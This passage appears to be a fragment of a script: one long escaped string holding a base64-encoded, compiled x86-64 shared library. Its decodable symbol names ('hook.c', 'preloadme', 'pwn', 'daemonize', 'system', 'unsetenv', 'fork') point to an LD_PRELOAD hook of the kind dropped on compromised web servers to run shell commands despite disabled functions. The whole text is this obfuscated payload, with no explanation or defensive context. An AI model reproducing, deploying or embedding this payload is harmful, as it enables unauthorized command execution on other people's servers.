x77\x38\146\121\101\102\x6d\114\147\70\146\150\x41\x41\101\101\x41\101\x41\147\104\x33\x78\102\171\101\101\101\x48\x55\x6e\x53\111\x4d\71\144\167\143\x67\x41\101\102\x56\x53\111\156\x6c\144\101\x78\x49\x69\x7a\x33\123\102\x79\x41\x41\x36\x44\63\x2f\x2f\57\x2f\157\123\120\x2f\57\x2f\x31\x33\107\102\143\x67\x48\111\x41\x41\x42\70\70\115\x50\x48\60\x41\101\x5a\x69\x34\120\110\x34\121\101\101\101\101\101\101\105\151\116\120\x56\153\x46\111\x41\102\x49\x67\x7a\70\x41\x64\x51\x76\x70\x58\166\57\x2f\57\62\x59\120\110\60\x51\101\x41\x45\151\x4c\x42\x52\153\x48\x49\x41\102\x49\x68\143\102\60\66\x56\x56\x49\151\x65\130\x2f\60\106\63\x70\121\x50\x2f\57\57\61\126\111\x69\x65\126\111\152\x54\x31\x36\x41\x41\x41\x41\66\106\x44\53\x2f\x2f\x2b\53\x2f\x77\x45\x41\x41\x45\x69\112\170\x2b\151\124\x2f\x76\57\x2f\x53\111\x30\71\x59\x51\x41\x41\101\117\147\63\57\x76\57\57\123\x49\x6e\110\66\x45\x2f\x2b\x2f\57\53\121\x58\x63\116\126\x53\111\x6e\x6c\x76\147\x45\x41\x41\101\x43\x2f\101\x51\x41\101\101\117\x68\x5a\57\166\57\57\66\112\x54\x2b\x2f\57\53\x46\x77\110\x51\113\x76\167\101\101\x41\101\104\x6f\144\166\67\x2f\x2f\65\x42\144\167\61\x56\x49\151\x65\x56\x49\x6a\x54\60\x6c\101\x41\101\101\x36\106\x50\53\57\x2f\57\x6f\x2f\166\x33\x2f\x2f\53\147\132\x2f\166\x2f\57\x6b\x46\63\x44\101\101\102\x49\x67\x2b\167\x49\x53\111\x50\x45\x43\x4d\116\x44\123\105\x46\x4f\x53\x31\x4a\120\x41\105\170\105\x58\61\x42\x53\x52\x55\x78\120\x51\125\x51\x41\101\x52\163\104\x4f\x7a\x51\101\101\x41\x41\106\101\101\x41\x41\165\120\x33\x2f\57\x31\x41\101\x41\x41\x42\x59\x2f\x76\x2f\x2f\145\101\x41\x41\x41\x47\152\57\57\x2f\53\x51\x41\x41\101\x41\156\x50\x2f\57\x2f\67\x41\101\x41\x41\104\x46\x2f\x2f\57\x2f\60\101\101\101\x41\101\101\101\101\x41\101\125\101\101\101\x41\101\x41\101\101\101\101\x46\66\x55\x67\101\x42\145\102\x41\102\107\167\167\110\x43\112\x41\x42\101\x41\101\x6b\101\101\101\x41\110\101\x41\x41\101\107\104\71\x2f\57\53\147\x41\x41\101\x41\x41\101\64\121\x52\x67\64\131\x53\x67\70\x4c\x64\167\151\x41\101\104\x38\141\x4f\x79\157\172\x4a\103\111\x41\x41\x41\101\101\x46\x41\x41\101\101\x45\121\x41\x41\101\x44\131\x2f\x66\x2f\57\103\101\x41\x41\101\x41\x41\101\x41\101\101\101\x41\101\x41\101\110\101\101\101\101\x46\x77\x41\101\101\104\121\57\x76\57\x2f\x4e\101\101\x41\101\x41\x42\102\104\150\x43\107\x41\x6b\115\116\x42\x6d\x38\115\102\x77\147\x41\101\101\x41\x63\x41\101\101\x41\146\x41\x41\x41\x41\117\124\53\x2f\x2f\x38\160\101\x41\101\101\101\105\105\117\105\111\131\x43\121\x77\x30\x47\x5a\101\x77\110\x43\101\x41\101\101\x42\x77\101\x41\x41\x43\143\101\x41\101\101\67\x66\67\x2f\x2f\x78\x30\x41\x41\101\x41\101\121\x51\x34\121\150\147\x4a\104\x44\121\132\x59\x44\x41\143\111\101\101\101\101\x41\101\x41\x41\101\101\101\x41\x41\x41\x41\101\x41\101\x41\101\101\101\x41\101\x41\101\101\101\101\x41\101\101\x41\x41\x41\x41\101\101\101\101\101\101\x41\x41\x41\101\101\101\101\101\x41\x41\x41\101\x41\x41\x41\x41\101\101\101\101\101\101\101\x41\x41\101\x41\x41\101\101\101\101\x41\x41\x41\101\x41\101\101\x41\101\101\x41\x41\101\101\x41\x41\x41\101\101\x41\101\101\x41\101\101\x41\x41\x41\101\101\x41\101\101\101\101\x41\x41\x41\101\x41\x41\x41\101\x41\x41\101\101\101\x41\x41\101\101\x41\101\101\x41\x41\x41\x41\101\x41\101\x41\101\x41\x41\x41\101\x41\101\x41\101\101\x41\x41\x41\x41\101\101\x41\x41\101\x41\101\x41\101\x41\101\101\x41\x41\x41\101\101\101\x41\101\101\x41\101\x41\101\x41\x41\101\101\101\x41\x41\x41\101\x41\x41\101\x41\x41\x41\x41\101\x41\101\x41\101\x41\101\101\x41\101\x41\101\101\x41\x41\101\x41\x41\101\x41\x41\101\x41\x41\101\101\101\x41\x41\x41\x41\x41\101\x41\101\x41\x41\x41\101\x41\101\x41\101\x41\x41\x41\x41\101\x41\101\101\101\x41\x41\101\x41\101\x41\x41\101\101\x41\101\x41\101\x41\x41\101\101\101\101\x41\x41\101\x41\x41\101\101\101\101\101\101\101\x41\x41\101\x41\x41\101\x41\x41\101\x41\101\101\101\x41\101\101\101\x41\101\x41\x41\101\x41\101\x41\x41\x41\101\101\x41\x41\101\x41\101\101\x41\101\101\101\x41\101\101\x41\101\x41\x41\101\101\x41\101\x41\101\x41\x41\x41\101\x41\101\101\101\x41\101\101\101\101\x41\x41\x41\x41\x41\x41\101\x41\101\x41\101\101\x41\x41\x41\x41\x41\101\x41\101\x41\x41\101\x41\x41\101\101\x41\x41\x41\x41\101\101\x41\101\x41\101\101\101\x41\101\x41\101\x41\x41\x41\101\101\101\x41\101\101\x41\x41\101\x41\101\101\101\x41\x41\x41\x41\101\x41\x41\x41\101\101\101\101\101\101\101\x41\x41\101\x41\x41\101\x41\101\101\x41\x41\101\x41\x41\101\101\101\x41\101\101\x41\101\101\101\101\x41\101\x41\101\101\x41\101\101\101\101\101\101\x41\x41\101\x41\101\101\x41\101\101\x41\101\101\x41\101\x41\x41\101\x41\x41\x41\101\x41\101\x41\x41\101\x41\101\101\101\x41\x41\101\101\x41\101\x41\x41\101\101\101\x41\101\x41\x41\101\101\x41\101\x41\x41\x41\101\101\101\101\101\x41\101\101\x41\x41\101\101\101\101\101\x41\101\x41\101\101\x41\101\x41\x41\101\x41\101\101\x41\x41\101\101\x41\x41\101\101\101\101\x41\101\101\101\101\x41\x41\101\101\x41\101\101\101\101\101\x41\101\101\101\x41\x41\101\101\x41\101\x41\101\101\x41\x41\101\x41\x41\101\101\x41\101\x41\x41\101\x41\x41\101\x41\101\101\x41\x41\x41\x41\x41\x41\101\101\x41\x41\101\x41\101\101\101\x41\x41\101\x41\101\x41\x41\x41\x41\101\x41\x41\101\101\101\x41\101\101\x41\x41\101\101\101\x41\101\101\x41\101\101\101\101\x41\x41\101\x41\x41\101\101\x41\101\x41\x41\101\101\101\x41\x41\101\101\x41\x41\x41\101\x41\x41\101\101\101\x41\101\x41\101\x41\101\101\x41\101\x41\101\101\101\x41\x41\x41\101\x41\x41\x41\101\101\x41\101\x41\x41\101\101\x41\x41\101\101\101\101\x41\101\101\101\101\x41\x41\101\101\101\101\101\101\101\x41\101\x41\x41\x41\101\x41\x41\x41\101\101\101\101\101\101\x41\x41\x41\101\x41\101\x41\101\101\101\x41\101\101\101\x41\101\101\x41\x41\x41\101\101\101\101\x41\101\101\101\101\x41\x41\101\x41\101\x41\101\x41\101\x41\101\101\x41\101\x41\101\101\101\101\x41\x41\101\101\x41\101\x41\x41\101\101\x41\101\101\101\101\x41\101\101\x41\101\101\x41\101\101\101\x41\101\x41\101\101\101\x41\x41\101\101\101\101\101\x41\101\101\x41\101\x41\101\101\101\x41\101\101\x41\101\101\101\x41\101\x41\101\x41\x41\x41\x41\101\101\101\101\101\x41\101\x41\101\101\x41\101\101\x41\x41\x41\101\x41\x41\x41\101\101\x41\101\101\x41\x41\x41\x41\x41\101\x41\101\101\x41\101\101\101\101\x41\101\x41\101\101\101\x41\x41\x41\101\x41\x41\101\101\x41\101\x41\101\x41\x41\x41\101\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\x41\101\101\101\x41\101\x41\x41\101\x41\101\x41\101\101\x41\101\101\101\x41\x41\x41\x41\x41\x41\101\x41\x41\101\101\x41\101\x41\101\x41\101\x41\x41\x41\101\x41\101\101\101\x41\101\101\101\x41\101\101\101\x41\101\x41\x41\x41\x41\101\101\101\x41\x41\101\x41\x41\101\101\101\x41\x41\101\x41\x41\101\x41\101\x41\101\101\101\101\x41\x41\101\x41\x41\x41\x41\101\101\101\x41\x41\x41\101\x41\x41\101\x41\x41\101\x41\101\x41\x41\x41\x41\101\x41\x41\x41\101\101\x41\x41\x41\101\101\x41\x41\x41\x41\101\x41\101\101\x41\x41\101\x41\101\x41\x41\x41\x41\x41\x41\101\101\101\x41\x41\101\101\x41\101\101\x41\x41\101\x41\101\101\x41\101\x41\101\101\101\x41\x41\101\x41\101\x41\x41\101\101\x41\101\101\101\101\101\x41\101\101\x41\x41\x41\101\101\101\101\101\x41\101\x41\101\101\101\x41\101\x41\x41\x41\x41\101\x41\101\x41\x41\x41\101\x41\101\101\x41\101\x41\101\x41\101\x41\101\x41\101\x41\101\101\x41\101\101\101\x41\101\x41\x41\x41\x41\x41\101\x41\x41\101\x41\101\101\101\x41\x41\x41\x41\101\x41\101\x41\101\x41\101\101\101\x41\x41\101\101\101\x41\x41\101\101\x41\101\x41\x41\x41\x41\101\101\101\101\x41\101\101\101\101\101\101\x41\101\x41\101\x41\101\x41\101\101\x41\x41\101\101\101\101\x41\x41\101\x41\x41\101\x41\x41\x41\101\101\x41\101\x41\x41\101\x41\101\101\x41\101\x41\101\x73\x41\147\x41\x41\101\101\101\x41\x41\101\x41\x41\101\101\101\x41\101\101\x41\101\x48\101\x49\101\101\101\101\x41\x41\x41\x41\101\x41\101\x41\x41\101\x41\101\101\x41\x41\x42\101\x41\x41\101\x41\x41\101\101\x41\114\x73\101\x41\x41\x41\101\x41\101\x41\101\x44\101\x41\101\x41\101\101\101\x41\x41\101\131\102\x77\101\x41\101\x41\101\101\101\x41\x30\101\101\x41\x41\x41\101\101\101\x41\130\x41\153\x41\x41\101\x41\x41\x41\x41\101\132\101\101\x41\101\x41\x41\101\101\101\120\147\116\111\x41\x41\101\x41\101\x41\x41\x47\x77\101\x41\101\101\x41\x41\101\101\101\x51\x41\101\101\x41\x41\x41\101\x41\x41\102\x6f\101\x41\x41\x41\101\101\x41\x41\x41\x43\101\64\147\101\101\x41\101\x41\x41\101\143\101\x41\101\x41\x41\101\101\x41\x41\x41\147\x41\x41\101\x41\x41\101\x41\101\x41\71\146\x37\57\142\167\101\101\x41\101\x44\x77\x41\x51\101\101\101\x41\x41\101\x41\x41\x55\101\101\x41\101\x41\101\101\x41\101\115\x41\121\x41\101\101\101\101\x41\x41\x41\x47\x41\x41\101\101\101\101\x41\x41\101\104\147\103\x41\101\x41\101\101\101\101\x41\103\147\101\101\101\101\101\101\101\x41\x44\160\101\101\x41\101\x41\x41\101\101\x41\101\163\x41\x41\x41\101\101\101\101\101\x41\107\x41\x41\101\101\x41\101\x41\101\101\101\x44\101\101\x41\101\101\x41\x41\101\x41\x41\101\121\x49\101\101\x41\x41\x41\x41\x41\x41\147\101\101\101\101\101\101\x41\101\104\131\x41\x41\x41\101\x41\x41\x41\x41\101\x42\x51\101\x41\101\101\x41\x41\101\x41\x41\x42\167\101\x41\x41\101\x41\x41\x41\x41\x41\x58\101\x41\101\x41\x41\x41\x41\x41\101\105\x41\x47\101\x41\x41\x41\101\101\x41\x41\x42\x77\x41\x41\101\101\101\101\101\101\102\157\102\x51\x41\101\x41\x41\101\x41\x41\x41\147\x41\101\x41\x41\x41\x41\101\x41\101\x32\101\101\x41\x41\101\x41\101\x41\x41\x41\x4a\101\x41\101\101\101\x41\x41\101\101\102\x67\x41\x41\x41\x41\x41\101\101\101\x41\57\x76\57\x2f\x62\x77\x41\x41\x41\x41\x42\111\102\x51\x41\x41\x41\101\x41\101\101\120\57\57\x2f\62\x38\x41\x41\x41\101\x41\x41\121\101\x41\101\101\101\101\x41\x41\104\x77\x2f\x2f\x39\166\x41\x41\x41\101\x41\102\157\x46\101\101\x41\x41\x41\101\101\x41\53\146\57\57\142\x77\x41\x41\101\x41\101\104\x41\x41\101\x41\x41\x41\x41\101\x41\x41\x41\101\x41\101\101\x41\x41\x41\101\x41\101\101\x41\x41\101\101\x41\x41\x41\101\x41\101\x41\x41\x41\101\x41\101\x41\x41\101\x41\x41\101\101\101\101\x41\x41\101\101\101\101\x41\x41\101\x41\x41\x41\x41\101\101\101\101\101\101\101\x41\101\101\x41\101\x41\101\x41\x41\x41\101\x41\101\101\x41\101\101\101\101\101\x41\x41\101\x41\101\101\101\101\101\x41\101\101\x41\101\x41\x41\x41\x41\x41\101\101\x41\101\x41\x41\101\101\101\101\101\101\101\101\101\x41\101\101\x41\101\x41\101\x41\x41\x41\101\x41\101\x41\x41\101\101\101\x41\x41\101\x41\101\101\101\101\x41\101\101\x41\x41\x41\101\x41\x41\x41\x41\101\x41\101\101\101\101\x41\x41\x41\101\101\102\x67\x4f\111\x41\x41\x41\x41\101\x41\x41\x41\x41\x41\101\101\101\101\101\x41\101\101\101\x41\x41\x41\101\101\x41\101\x41\x41\x45\131\110\101\101\x41\101\x41\101\101\101\126\147\x63\x41\101\101\101\x41\101\x41\102\155\102\x77\101\101\x41\x41\x41\101\101\110\131\110\x41\101\101\x41\x41\101\101\101\150\x67\143\x41\101\101\101\101\x41\101\x43\127\102\x77\x41\101\x41\x41\101\x41\x41\x4b\131\110\x41\101\101\101\x41\101\x41\x41\164\x67\143\101\101\x41\101\x41\x41\101\104\x47\x42\x77\101\x41\x41\101\101\101\x41\107\x41\121\x49\x41\101\x41\x41\101\101\101\x52\x30\116\x44\x4f\151\101\157\x52\x47\126\x69\141\x57\x46\165\111\x44\131\165\x4d\171\64\167\x4c\x54\105\64\113\x32\122\154\131\152\154\61\115\x53\153\x67\116\x69\x34\x7a\114\x6a\101\147\115\152\x41\x78\x4e\x7a\101\61\x4d\124\x59\x41\x41\101\x41\101\101\101\x41\101\101\x41\x41\x41\101\101\x41\101\x41\101\x41\101\101\x41\x41\101\x41\101\101\x41\101\x41\101\x41\101\x41\101\101\x41\x41\101\101\x41\101\115\x41\x41\121\104\111\x41\121\101\101\x41\x41\x41\x41\101\x41\x41\101\x41\x41\x41\101\101\101\x41\x41\x41\x41\x41\x41\101\x41\x4d\101\101\x67\104\167\x41\121\101\101\x41\101\x41\x41\x41\101\x41\x41\101\x41\x41\x41\101\101\101\101\101\101\101\101\x41\101\x4d\x41\x41\x77\101\x34\x41\x67\x41\101\101\101\101\x41\101\x41\101\x41\x41\x41\x41\101\x41\x41\x41\101\x41\x41\101\101\101\101\x4d\101\102\101\101\x77\102\x41\101\101\x41\101\101\x41\101\101\x41\x41\x41\101\x41\101\101\x41\101\x41\x41\101\x41\101\x41\101\115\x41\x42\121\x41\x61\x42\121\x41\x41\x41\101\101\x41\x41\x41\x41\101\x41\x41\101\x41\x41\101\x41\101\x41\101\101\x41\x41\101\115\101\x42\x67\x42\x49\102\121\101\101\x41\101\x41\101\101\101\101\101\x41\x41\101\x41\101\101\101\x41\x41\x41\x41\x41\x41\x41\115\101\102\167\102\157\102\121\x41\x41\101\101\x41\x41\101\101\x41\101\101\x41\101\101\x41\x41\101\101\101\101\101\x41\101\x41\115\101\x43\x41\x42\x41\102\147\101\x41\x41\101\101\101\101\101\101\x41\x41\101\x41\101\101\x41\x41\x41\x41\101\101\x41\x41\x41\x4d\101\x43\121\101\x59\x42\167\x41\x41\101\101\101\x41\101\101\101\101\101\x41\x41\x41\101\x41\x41\101\x41\101\x41\x41\x41\101\x4d\101\x43\x67\101\x77\x42\167\x41\x41\101\101\101\101\101\x41\x41\101\x41\x41\x41\101\x41\101\x41\101\x41\101\101\101\x41\x41\x4d\x41\x43\x77\x44\121\x42\167\101\101\x41\x41\101\x41\x41\x41\101\x41\x41\x41\x41\101\x41\x41\x41\x41\101\x41\x41\x41\x41\101\x4d\101\x44\101\104\147\102\167\101\101\101\x41\101\x41\x41\101\x41\101\x41\x41\x41\x41\101\101\x41\101\x41\101\x41\x41\x41\101\x4d\101\x44\121\x42\143\103\121\x41\x41\101\x41\101\x41\101\x41\x41\x41\101\101\101\101\x41\x41\101\101\101\101\101\101\x41\101\x4d\101\x44\147\x42\x6c\x43\121\101\101\x41\101\x41\101\101\x41\x41\101\x41\x41\101\x41\x41\101\101\x41\x41\x41\x41\101\x41\101\115\x41\x44\167\102\64\x43\121\x41\x41\x41\x41\x41\101\101\x41\101\x41\101\x41\101\101\101\x41\x41\x41\101\101\101\x41\101\x41\x4d\101\105\x41\103\167\103\121\101\x41\x41\101\101\101\101\x41\101\x41\101\101\101\101\x41\x41\101\x41\x41\101\x41\101\x41\101\x4d\101\105\x51\104\64\104\123\101\x41\x41\x41\x41\x41\x41\x41\x41\101\101\x41\101\101\x41\x41\101\x41\x41\101\x41\101\x41\x41\115\x41\105\x67\101\x49\104\151\101\x41\x41\x41\101\101\x41\101\101\101\101\101\101\x41\101\x41\x41\x41\101\101\101\x41\101\101\x4d\x41\105\167\x41\x51\104\151\101\x41\x41\101\101\x41\x41\x41\101\101\x41\x41\x41\101\101\101\101\x41\101\101\101\x41\101\101\115\101\x46\101\x41\x59\104\x69\101\x41\x41\101\101\x41\101\101\x41\x41\x41\x41\101\x41\x41\x41\x41\101\x41\x41\101\101\x41\101\115\101\x46\121\x44\x59\104\171\101\101\x41\101\x41\101\x41\x41\x41\x41\101\x41\101\101\x41\x41\x41\x41\x41\101\101\101\x41\x41\115\x41\x46\x67\x41\x41\105\103\x41\x41\x41\x41\x41\x41\101\101\x41\101\x41\101\x41\x41\x41\x41\x41\x41\101\x41\101\101\x41\101\x4d\x41\106\x77\102\x67\x45\x43\101\x41\x41\101\x41\x41\x41\x41\101\x41\x41\x41\x41\101\x41\101\101\x41\101\x41\x41\101\101\x41\115\x41\107\x41\x42\157\x45\x43\101\x41\101\x41\101\101\x41\101\101\x41\101\101\101\101\x41\x41\x41\101\101\x41\101\x41\101\x41\115\x41\x47\121\x41\x41\101\101\101\101\101\x41\101\101\101\101\x41\101\101\x41\x41\101\x41\101\101\x41\x41\121\101\x41\101\101\x51\101\x38\x66\x38\x41\x41\101\x41\101\x41\x41\101\x41\101\101\x41\101\101\x41\101\x41\101\x41\x41\x41\104\x41\x41\101\x41\x41\105\101\x45\x77\x41\x51\x44\151\101\x41\x41\x41\x41\101\101\x41\x41\x41\101\101\101\101\101\101\x41\101\x47\121\101\x41\x41\101\111\x41\104\101\x44\x67\x42\x77\101\101\x41\x41\x41\101\101\x41\x41\x41\x41\x41\101\x41\101\101\x41\x41\107\167\101\101\x41\x41\111\x41\x44\101\101\147\x43\101\101\x41\x41\101\x41\101\101\x41\x41\x41\x41\x41\x41\101\x41\x41\x41\x41\x4c\147\101\101\x41\101\111\x41\x44\101\x42\167\x43\x41\x41\x41\x41\x41\101\101\101\x41\x41\x41\x41\x41\x41\101\x41\101\x41\x41\x52\x41\x41\101\101\x41\105\101\x47\101\x42\157\x45\x43\x41\101\101\101\x41\101\101\x41\105\x41\x41\101\101\101\x41\101\101\101\x55\167\x41\101\101\101\x45\101\x45\147\101\111\104\x69\x41\x41\101\101\101\101\101\101\x41\x41\x41\x41\x41\x41\x41\x41\101\101\x65\x67\101\101\101\x41\x49\101\x44\101\103\x77\103\x41\101\x41\x41\x41\x41\101\101\101\101\101\x41\x41\x41\101\101\101\101\x41\150\x67\101\101\101\x41\105\x41\105\121\104\64\104\123\x41\x41\x41\101\x41\x41\x41\101\x41\101\101\x41\x41\x41\101\101\101\101\x70\121\101\x41\101\101\121\x41\70\x66\70\101\101\x41\101\x41\101\x41\x41\x41\101\101\101\101\x41\x41\x41\x41\x41\x41\x41\101\101\121\x41\101\x41\x41\x51\x41\x38\146\x38\101\101\101\101\101\x41\101\101\x41\101\x41\101\x41\101\101\x41\101\x41\101\101\x41\x72\x41\101\101\x41\x41\x45\101\105\x41\x42\157\103\147\101\x41\x41\x41\101\x41\101\101\101\101\x41\101\x41\101\x41\x41\101\101\x75\x67\101\x41\101\101\105\101\105\x77\x41\121\x44\x69\101\101\x41\x41\x41\x41\x41\x41\101\x41\101\x41\x41\101\101\101\x41\101\101\101\101\101\101\x41\x51\x41\70\146\x38\x41\x41\101\x41\101\101\x41\101\101\x41\x41\x41\x41\x41\x41\x41\x41\101\101\x41\x41\x78\147\x41\x41\x41\x41\x45\x41\x46\x77\102\147\105\x43\x41\101\x41\x41\101\101\x41\101\101\101\101\101\x41\101\x41\101\x41\x41\60\167\101\x41\101\101\x45\101\106\101\x41\x59\104\x69\x41\x41\x41\101\x41\x41\x41\x41\101\x41\101\101\x41\101\x41\x41\x41\x41\63\101\x41\x41\x41\101\x41\x41\x44\167\102\x34\x43\x51\101\x41\101\101\x41\x41\101\x41\101\x41\x41\x41\101\101\101\101\101\x41\67\167\101\101\x41\101\105\101\106\167\102\157\x45\x43\x41\101\101\x41\x41\x41\101\101\101\101\x41\x41\x41\101\x41\x41\x41\x41\53\x77\x41\101\101\101\105\x41\106\x67\x41\101\105\103\101\101\101\x41\101\101\101\x41\x41\101\x41\101\x41\x41\101\101\101\x41\x45\x51\105\101\x41\102\111\101\x41\101\x41\101\x41\x41\101\101\x41\x41\x41\x41\x41\x41\101\101\x41\x41\x41\x41\101\101\x41\101\x4a\121\105\x41\101\103\x41\x41\x41\101\x41\101\101\x41\x41\101\101\x41\x41\x41\x41\101\x41\101\x41\101\x41\101\x41\x41\x41\101\121\x51\x45\101\101\102\101\101\x46\x77\x42\x6f\x45\x43\x41\101\101\x41\101\101\x41\101\x41\101\101\101\101\x41\x41\101\101\x41\x53\101\105\x41\101\102\111\101\x44\x41\101\125\x43\x51\101\x41\x41\x41\101\101\x41\x43\x6b\101\x41\101\x41\101\x41\x41\x41\101\125\147\105\101\101\x42\111\x41\104\x51\x42\x63\103\x51\101\x41\101\x41\x41\101\x41\101\101\101\x41\101\x41\101\101\101\x41\x41\127\x41\105\x41\x41\x42\111\x41\101\x41\101\101\101\101\x41\101\101\101\x41\101\101\x41\101\x41\x41\x41\x41\101\101\x41\101\x41\142\101\105\101\x41\x42\111\101\104\x41\x44\147\x43\101\101\101\101\x41\x41\x41\101\x44\x51\101\101\x41\x41\101\101\x41\x41\x41\143\101\x45\x41\x41\x42\x49\x41\101\x41\x41\x41\x41\101\x41\101\x41\101\101\x41\101\101\x41\101\101\101\101\101\x41\x41\101\101\150\x41\105\x41\101\103\x41\x41\101\101\101\101\x41\x41\101\101\x41\x41\x41\101\101\x41\101\x41\x41\x41\101\x41\101\x41\x41\x41\153\x77\x45\x41\101\102\111\x41\x44\101\101\71\x43\x51\101\x41\x41\101\101\101\101\x42\60\x41\x41\101\x41\101\x41\x41\x41\x41\156\121\105\x41\101\102\x41\101\x47\101\x42\x77\x45\103\101\101\101\101\101\101\x41\x41\101\101\x41\101\x41\101\x41\101\101\101\157\x67\x45\101\x41\102\x41\x41\107\101\102\157\x45\x43\x41\x41\x41\x41\101\101\101\101\x41\x41\101\101\x41\x41\101\x41\x41\x41\162\x67\105\101\x41\x42\111\101\x41\x41\x41\101\x41\101\x41\x41\x41\101\101\101\101\101\x41\101\101\x41\x41\x41\x41\x41\x41\x41\x77\121\x45\101\101\x43\x41\x41\x41\101\101\x41\101\101\x41\x41\101\101\101\101\x41\101\101\x41\x41\101\101\101\x41\101\x41\101\61\121\105\x41\101\102\111\101\101\101\x41\x41\101\x41\x41\101\x41\101\101\101\x41\x41\x41\x41\101\x41\x41\101\x41\x41\x41\101\x36\167\105\x41\101\102\111\101\x41\x41\x41\x41\x41\101\101\x41\x41\101\101\101\101\x41\101\x41\101\101\101\x41\x41\x41\x41\101\57\x51\x45\101\101\x43\101\x41\x41\x41\101\101\101\101\101\x41\x41\x41\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\x41\101\101\x41\x46\167\111\x41\x41\103\111\x41\x41\101\101\x41\101\x41\x41\x41\x41\x41\x41\101\101\x41\x41\x41\101\x41\101\x41\x41\x41\101\x41\x4d\167\x49\101\x41\102\111\101\103\x51\101\131\x42\167\101\101\x41\x41\101\101\101\x41\x41\101\101\101\x41\101\x41\101\x41\x41\x4f\x51\x49\101\x41\102\111\x41\101\x41\101\x41\101\x41\101\101\x41\x41\x41\x41\x41\101\101\101\101\101\101\101\x41\101\x41\x41\x41\107\x4e\171\144\110\x4e\x30\144\x57\132\x6d\x4c\155\x4d\101\130\61\71\x4b\x51\61\x4a\146\124\x45\154\124\x56\106\71\x66\101\107\122\154\143\x6d\x56\x6e\x61\x58\x4e\x30\132\x58\112\146\x64\x47\61\x66\x59\62\170\166\x62\x6d\126\172\x41\106\x39\x66\x5a\x47\71\146\132\62\x78\166\131\155\x46\163\x58\62\x52\x30\x62\x33\112\x7a\x58\x32\x46\x31\145\101\102\x6a\x62\62\61\x77\142\x47\126\60\x5a\x57\121\x75\116\x6a\x6b\x33\115\147\x42\x66\130\62\122\166\130\x32\144\x73\142\62\112\x68\x62\106\71\153\144\107\x39\171\x63\x31\71\150\x64\x58\150\x66\132\x6d\154\x75\141\x56\x39\x68\143\156\x4a\x68\145\126\x39\154\x62\156\122\171\x65\121\x42\x6d\143\x6d\x46\x74\132\x56\71\153\x64\x57\x31\164\145\121\102\146\130\62\132\x79\131\127\61\154\130\x32\x52\61\142\127\x31\65\x58\x32\x6c\165\141\x58\x52\146\x59\130\x4a\x79\131\130\x6c\x66\x5a\127\65\x30\x63\156\153\101\x61\107\x39\166\x61\x79\x35\x6a\101\x46\71\x66\122\154\x4a\x42\124\x55\x56\146\x52\125\x35\105\130\61\70\101\x58\x31\x39\x4b\121\61\x4a\146\x52\125\65\105\x58\61\70\101\130\61\71\x6b\143\62\x39\x66\141\x47\x46\165\x5a\107\170\154\x41\106\x39\x45\x57\x55\x35\x42\x54\125\x6c\104\101\x46\71\x66\122\60\x35\x56\x58\x30\126\111\130\x30\x5a\x53\x51\125\x31\x46\130\60\x68\105\125\x67\x42\x66\130\61\x52\x4e\x51\61\71\x46\x54\153\x52\146\x58\167\x42\146\x52\60\x78\x50\x51\153\106\115\x58\60\x39\x47\122\154\116\106\126\x46\x39\125\121\125\x4a\x4d\x52\126\x38\101\132\x32\x56\x30\132\x57\x35\x32\121\105\x42\x48\x54\105\154\x43\x51\x31\x38\x79\x4c\152\x49\x75\116\x51\x42\146\123\126\x52\116\130\62\x52\154\143\155\126\156\x61\x58\116\x30\132\130\112\125\x54\x55\x4e\163\142\62\65\154\126\107\x46\151\142\107\125\x41\x58\x32\x56\153\x59\130\122\x68\101\107\122\x68\x5a\127\x31\166\142\x6d\154\66\x5a\x51\x42\x66\x5a\x6d\x6c\165\x61\121\102\x7a\145\x58\116\x30\x5a\127\61\x41\x51\x45\x64\x4d\x53\125\112\104\x58\x7a\111\165\x4d\151\64\61\x41\x48\102\63\142\147\x42\x7a\141\127\144\x75\x59\127\x78\101\121\105\x64\115\123\125\112\x44\130\172\x49\165\x4d\x69\64\x31\101\106\x39\x66\x5a\62\61\x76\x62\x6c\x39\172\x64\x47\x46\171\144\x46\71\x66\101\x48\102\x79\132\x57\170\166\131\x57\x52\164\132\x51\x42\146\132\127\65\x6b\x41\x46\x39\146\x59\156\116\172\x58\x33\116\60\x59\130\112\x30\101\107\x4e\x6f\x62\x57\x39\153\x51\105\102\110\124\x45\x6c\103\121\x31\x38\x79\x4c\152\111\x75\116\121\102\x66\x53\156\x5a\146\x55\155\x56\x6e\x61\130\x4e\x30\132\130\112\x44\142\107\x46\172\x63\x32\x56\x7a\x41\110\126\x75\x63\62\x56\60\132\x57\x35\x32\121\x45\x42\x48\124\105\154\103\x51\61\70\x79\114\152\111\x75\x4e\121\x42\154\x65\107\x6c\60\121\105\102\x48\x54\105\154\x43\121\x31\70\171\x4c\152\111\165\x4e\x51\102\x66\123\x56\x52\x4e\130\63\x4a\x6c\132\x32\154\x7a\144\107\x56\x79\x56\x45\61\104\x62\x47\x39\x75\x5a\126\x52\x68\x59\155\170\154\x41\106\71\146\x59\x33\150\x68\130\62\x5a\160\142\x6d\106\163\141\x58\160\154\x51\x45\x42\110\124\x45\154\x43\121\61\x38\x79\114\x6a\x49\x75\116\x51\102\146\x61\127\x35\x70\x64\x41\102\155\x62\63\x4a\162\121\105\102\x48\124\105\x6c\103\x51\x31\x38\171\x4c\152\111\165\116\x51\x41\x41\114\156\x4e\x35\142\x58\122\x68\131\147\x41\x75\x63\63\x52\171\x64\x47\x46\x69\101\x43\x35\x7a\x61\x48\x4e\x30\143\156\122\x68\131\x67\101\x75\142\x6d\71\x30\x5a\123\x35\156\x62\156\125\165\131\x6e\x56\x70\142\x47\x51\164\x61\127\121\x41\114\155\x64\x75\144\x53\65\157\x59\x58\116\x6f\101\103\x35\x6b\x65\x57\65\172\x65\x57\60\x41\x4c\x6d\122\65\x62\156\116\x30\143\147\101\165\132\x32\65\x31\x4c\156\132\x6c\143\156\116\160\142\x32\64\x41\114\x6d\x64\165\x64\123\65\x32\x5a\130\112\172\141\127\71\x75\x58\63\111\x41\114\x6e\x4a\x6c\x62\107\x45\165\132\x48\154\x75\x41\x43\x35\x79\x5a\x57\x78\x68\114\156\102\163\144\x41\101\x75\x61\x57\x35\x70\x64\x41\101\x75\x63\107\x78\60\x4c\155\144\166\x64\x41\101\x75\144\x47\126\x34\x64\x41\x41\x75\132\x6d\x6c\x75\x61\x51\101\x75\x63\155\x39\153\131\130\122\150\x41\103\x35\154\141\x46\71\155\143\155\106\x74\132\x56\71\157\x5a\x48\x49\x41\114\x6d\126\157\x58\62\x5a\x79\x59\x57\x31\154\x41\103\x35\x70\142\x6d\x6c\x30\x58\x32\x46\171\x63\155\106\65\101\x43\x35\x6d\x61\127